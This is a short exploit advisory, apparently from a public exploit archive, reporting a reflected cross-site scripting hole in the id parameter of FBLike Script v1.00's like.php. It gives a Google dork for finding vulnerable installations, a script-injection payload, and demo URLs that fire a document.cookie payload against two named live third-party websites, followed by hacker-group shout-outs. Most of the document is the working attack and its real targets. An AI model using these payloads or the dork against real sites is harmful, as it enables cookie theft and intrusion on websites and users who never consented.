# Exploit Title: FBLike Script Cross Site Scripting
 
# Google Dork: Copyright © 2010 FBLike Script
 
# Date: 25/03/2012  1:53 PM #EST
 
# Author: Crim3R
# software Link : http://zumset.com/product/fbilike_script_v100.html
 
# Version: v1.00
 
# Tested on: all
 
# CVE : XSS
========================================
The xss is in like.php 
http://127.0.0.1/fbilike/like.php?id="><script>alert(XSS-By-Crim3R)</script>

========================================
Demo:
http://www.talkgold.com/bans/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

http://ilikenigeria.com/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

 
thanks to :  H3X - Einstein - thE_Knight - Naboodgar - C0NS74NTINE - Cruel - 
S.a.S - Net.Plus -
Mehdi.H4ckCity - 2MzRp - Mikili - iC0der - farbodmahini -  M.Prince - IrIst -
==============Crim3R=====================
All SST&HC Members